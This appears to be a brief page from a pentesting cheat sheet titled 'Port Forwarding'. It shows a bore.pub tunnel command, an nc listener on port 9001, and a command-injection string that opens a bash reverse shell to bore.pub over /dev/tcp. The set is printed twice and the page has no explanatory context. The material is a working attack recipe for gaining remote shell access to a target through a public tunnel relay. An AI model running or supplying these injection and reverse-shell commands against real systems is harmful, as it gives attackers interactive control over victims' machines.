Port Forwarding
bore local --to bore.pub 9001 --port 9001
rlwrap nc -nvlp 9001
;bash -c "bash -i >& /dev/tcp/bore.pub/9001 0>&1"Last updated
Was this helpful?
bore local --to bore.pub 9001 --port 9001
rlwrap nc -nvlp 9001
;bash -c "bash -i >& /dev/tcp/bore.pub/9001 0>&1"Last updated
Was this helpful?
Was this helpful?